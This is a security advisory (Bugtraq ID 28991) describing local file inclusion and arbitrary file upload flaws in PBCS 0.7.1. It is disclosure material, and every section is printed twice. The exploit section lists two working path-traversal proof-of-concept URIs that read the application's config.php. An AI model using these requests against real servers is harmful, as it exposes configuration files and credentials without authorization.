PBCS Multiple Input Validation Vulnerabilities
BID:28991
Info
PBCS Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 28991 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-2216 CVE-2008-2215 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 30 2008 12:00AM |
| Updated: | Jul 05 2016 10:01PM |
| Credit: | GoLd_M |
| Vulnerable: |
PBCS PBCS 0.7.1 |
| Not Vulnerable: | |
Discussion
PBCS Multiple Input Validation Vulnerabilities
PBCS (Project Based Calendaring System) is prone to multiple input-validation vulnerabilities, including multiple local-file-include issues and an arbitrary-file-upload issue.
An attacker can exploit these vulnerabilities to view local files and to upload and execute arbitrary script code within the context of the webserver process.
Project Based Calendaring System 0.7.1 is vulnerable; other versions may also be affected.
PBCS (Project Based Calendaring System) is prone to multiple input-validation vulnerabilities, including multiple local-file-include issues and an arbitrary-file-upload issue.
An attacker can exploit these vulnerabilities to view local files and to upload and execute arbitrary script code within the context of the webserver process.
Project Based Calendaring System 0.7.1 is vulnerable; other versions may also be affected.
Exploit / POC
PBCS Multiple Input Validation Vulnerabilities
Attackers can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/pbcs-0.7.1-1/src/yopy_sync.php?download_file=0&filename=../config/config.php
http://www.example.com/plugins/system-logger/print_logs.php?filename=../../config/config.php
Attackers can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/pbcs-0.7.1-1/src/yopy_sync.php?download_file=0&filename=../config/config.php
http://www.example.com/plugins/system-logger/print_logs.php?filename=../../config/config.php
Solution / Fix
PBCS Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].